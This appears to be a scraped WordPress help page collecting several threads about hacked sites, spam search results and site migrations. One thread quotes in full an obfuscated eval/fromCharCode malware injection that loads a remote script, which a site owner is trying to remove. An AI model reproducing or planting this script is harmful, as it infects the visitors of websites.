internal fake links shows in google search results - wordpress

I recently had a strange problem on my site. This is a problem with urls that have not any relation my content (see screenshot with fake links in google search results). Fortunately these links are no external spam links.
So I decided to do the following steps:
I've reviewed my site with a security checker, such as sucuri, unmasking, and all of these sites announced that my site is completely clean.
I deleted the old WordPress files (except wp-config & wp content folder) and replaced them with fresh and clean files.
1.I replaced the entire theme system files (php, js, etc.) with new and fresh files.
2.I changed all the passwords and worpress salts with using itheme security plugin, removed .htaccess file and let wordpress create a new one.
3.I removed the unrelated links using google webmasters.
4.I also removed suspicious plugins and restored the full version of my site's backup two weeks ago.
Unfortunately until today the links are not gone. All urls share the same word "marblehead". Like the following URL:
omranf1.com/conkers/marblehead/15244_17630.asp/page/2/
The interesting thing is that in the description section of search results of each of these URLs, abstract part (or meta tag description) of content of my site is displayed.
Has anyone come up with a solution to this problem? I'm really confused how to get rid of this problem!

Related

How does a virus infect my WordPress site?

For the second time, I’m removing the Malware injection from posts on my WordPress site:
<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>
This code was inside every post.
Using the plugin Better Search Replace, I deleted all found inserts from all posts. No inserts were found in other database tables.
I checked the site for viruses using various plugins - such as Wordfence, etc. No infection results.
Only I work with sites. My computer is well protected. Checked with different anti-virus scanners - everything is clean!
I tried to find modified WordPress files as well as plugins. Purely! No suspicious files found!
How to find the cause of infection?
There are 2 reasons why you are not able to remove jar.trafficbetter.biz malware from your WordPress site.
you are using old, outdated nulled theme/child theme on your Wordpress site.
the code was SQL injected to your database, and code is being populated on you site again and again.
these are a clever piece of code and cannot be detected by any antivirus,
if you want to know what the code is doing use the following link.
https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html
So to solve the problem, change or update your theme to the latest version.
backup your database, and then search for the script in the database and remove the entry.

Renamed and Transferred site successful but old Social Media links are broken

I just got finished with moving my site from one domain name to another. All old links on social media and search engines are broken. If I click on a link from reddit or Facebook it still points to oldwebsite.com. Even though if I type oldwebsite.com into a browser, newwebsite.com does pop up. Is there anyway I can resolve this issue? All I did was export the old site data, switched to the new site, and imported the new site back. What am I missing now?
Google is coming with weird results when I search for this topic. I am using godaddy and wordpress with over 500 posts if it matters. Thank you.
It seems you are adding the social media links in the template files like footer.php of header.php
please double check once again.
If you change site_url in wp-admin in also and if the social media links loading from templates then it wont reflect the old site to new site

The whole wordpress website got RESET

My wordpress blog was working perfectly fine, until one day when suddenly my blog got down. All I could see was a blank white page. I still don't know the reason.
But initially, I was able to figure out the Debug messages, which were some compatibility issues between prototype of function Walker() and some theme function extending Walker(). So, I somehow managed to resolve those issues, by changing the theme function prototype.
But still, I could only view a blank page without any error. Then, I went through my child theme files and I found that there was some PHP code written to upload image file in child "style.css". Fortunately, I had backup of my Blog so I restored my child style.css.
After so many efforts, I still couldn't restore my complete Blog.
Although, All the posts and everything is there in DB, but I can't see any post on my Blog and Admin panel. It seems that my created categories are no longer there in Admin panel, when I restored theme.
Can anyone please help me to find out...
Why it happened and How my blog got reset ?
How can I restore my blog and reflect all my posts from DB to Admin-panel & Blog ?
It looks like somebody hacked you up. And, edited some files on your server.
Wordpress, actually doesn't offer any backup features. But, most of the web hosting services have a usual backup option. So, you might consider that.
Or, if your Wordpress database is right in place, as before, then you the possible error is that your Wordpress core files are corrupted or edited by anyone. So, you might consider, deleting your Wordpress and reinstalling it, (without deleting your databases). This would not affect your blog at all, because all Wordpress information is stored in the databases. But, remember to backup the files of wp-content folder and copy them to your new installation.

Subdomain mapping

I have shifted my word press blog on my website as its sub domain, but internal pages are still showing old blog's URL.
how can I resolve this problem ?
Read Moving WordPress, the canonical document on how to move a Wordpress blog in the Codex, especially item 10.
Existing image/media links uploaded media will refer to the old folder and must be updated with the new location. You can do this with the Velvet Blues Update URLs plugin, or with a search and replace tool, or manually in your SQL database, by following the instructions at Tamba2's Tutorial "Moving your weblog inside your PC".

Meta Description Shows Spam

I have website (thebyandby.com) that got hacked several weeks ago. The problem is, the description on Google is showing a spam description for viagra and one the most popular posts (when linked to from Google) goes to a spam website.
The site is a WordPress website so I reinstalled the theme and made sure everything was updated. There are only two plugins installed, Akismet and Google Analytics. I don't think the plugins could be effected but I am not sure. The problem was still there so I checked when Google last indexed my site and it was after I had reinstalled my theme. I checked for malware from Google Webmaster and it said it didn't find any malware. I ran grep -r "viagra" on my entire web directory and nothing was found. I really don't know what else to do. Could this be a database problem?
Yes, it could well be that you have content in the database which is compromised. After all, that's where all the pages and posts are stored. Does your hosting company provide a tool like phpMyAdmin for browsing and editing the database?
But equally, if you have only reinstalled the theme then there are a lot more core WordPress files that could have been compromised by the hacker. Given that you are having problems, it would be well worth doing a complete reinstall of the WordPress files. Just make sure you keep a copy of your wp-config file, as you will need to copy that back. Also make sure you reinstall the same version of WordPress that you currently have.
But you know what: It may save you time in the long-run to just export all your posts and pages from within WordPress and then wipe the hacked site completely and install the whole thing from scratch. You can open the export file in any decent editor and once you've got your head around the XML structure, you can delete any rubbish that the hacker put there. I guess this option depends on how much content you had already put up on the site and how readily you could reconfigure the new site to match the old one.
Of-course if you have a full files and database backup from before the hacker got there, then you have an easy option that avoids all this grief ;-)

Resources